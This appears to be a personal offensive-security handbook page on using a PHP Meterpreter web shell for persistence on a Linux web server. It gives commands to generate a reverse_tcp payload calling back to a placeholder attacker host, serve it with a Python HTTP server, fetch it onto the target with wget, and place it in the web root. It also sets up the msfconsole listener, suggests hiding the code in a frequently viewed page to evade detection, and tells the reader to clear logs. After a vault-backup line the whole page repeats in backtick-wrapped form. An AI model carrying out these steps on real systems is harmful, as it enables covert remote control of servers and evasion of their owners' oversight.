handbook/tools/5.Machine/1.Linux/General/Exploitation/2.Persistence/4.Web-Shell-BackDoor.md


## General

A web shell is a type of backdoor that allows an attacker to remotely control a compromised system through a web browser. A web shell is typically a script, written in a language such as PHP or ASP, that is uploaded to a web server. Once the script is uploaded, the attacker can use a web browser to connect to the server and execute commands on the system through the web shell.

Web shells can be used to maintain persistence on a compromised system by providing the attacker with a way to remotely access and control the system over an extended period of time. The web shell can be configured to start automatically when the system is booted, or it can be triggered manually by the attacker whenever they want to access the system.

Web shells can be used to perform a variety of malicious actions, such as uploading and downloading files, modifying system settings, and executing arbitrary code on the system. They can also be used to gather sensitive information, such as passwords and other sensitive data.


## Commands

Requirements, The server need to run a webserver to create this persistance

Meterpreter Backdoor
```
# Generate the Payload
msfconsole -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -e php/base64 -f raw > Evilbackup.php      ---> If we use PHP

# Edit the Payload (Add php tags)
<?php
PAYLOAD
?>

# Transfer the file to the target Machine
python3 -m http.server

# Save the folder under ww
wget http://IP/Evilbackup.php
chmod +x Evilbackup.php
mv Evilbackup.php ~/var/www/html
```

Take not that you could add the code in a page that get view often also, this could be a great way to evade detection since your not creating a new file and hidding it trougt other codes

Exploit the WebShell (set lisener)
```
msfconsole
set payload php/meterpreter/reverse_tcp (Also set LHOST and LPORT)
run
```


===Dont Forget to Clear Tracks (Check [[🧹 CLEAR Logs & History]])===
vault backup: 2024-08-31 01:07:21 2024-08-30 23:07:22 +00:00
			`## General`

			`A web shell is a type of backdoor that allows an attacker to remotely control a compromised system through a web browser. A web shell is typically a script, written in a language such as PHP or ASP, that is uploaded to a web server. Once the script is uploaded, the attacker can use a web browser to connect to the server and execute commands on the system through the web shell.`

			`Web shells can be used to maintain persistence on a compromised system by providing the attacker with a way to remotely access and control the system over an extended period of time. The web shell can be configured to start automatically when the system is booted, or it can be triggered manually by the attacker whenever they want to access the system.`

			`Web shells can be used to perform a variety of malicious actions, such as uploading and downloading files, modifying system settings, and executing arbitrary code on the system. They can also be used to gather sensitive information, such as passwords and other sensitive data.`


			`## Commands`

			`Requirements, The server need to run a webserver to create this persistance`

			`Meterpreter Backdoor`
			```
			`# Generate the Payload`
			`msfconsole -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -e php/base64 -f raw > Evilbackup.php ---> If we use PHP`

			`# Edit the Payload (Add php tags)`
			`<?php`
			`PAYLOAD`
			`?>`

			`# Transfer the file to the target Machine`
			`python3 -m http.server`

			`# Save the folder under ww`
			`wget http://IP/Evilbackup.php`
			`chmod +x Evilbackup.php`
			`mv Evilbackup.php ~/var/www/html`
			```

			`Take not that you could add the code in a page that get view often also, this could be a great way to evade detection since your not creating a new file and hidding it trougt other codes`

			`Exploit the WebShell (set lisener)`
			```
			`msfconsole`
			`set payload php/meterpreter/reverse_tcp (Also set LHOST and LPORT)`
			`run`
			```



			`===Dont Forget to Clear Tracks (Check [[🧹 CLEAR Logs & History]])===`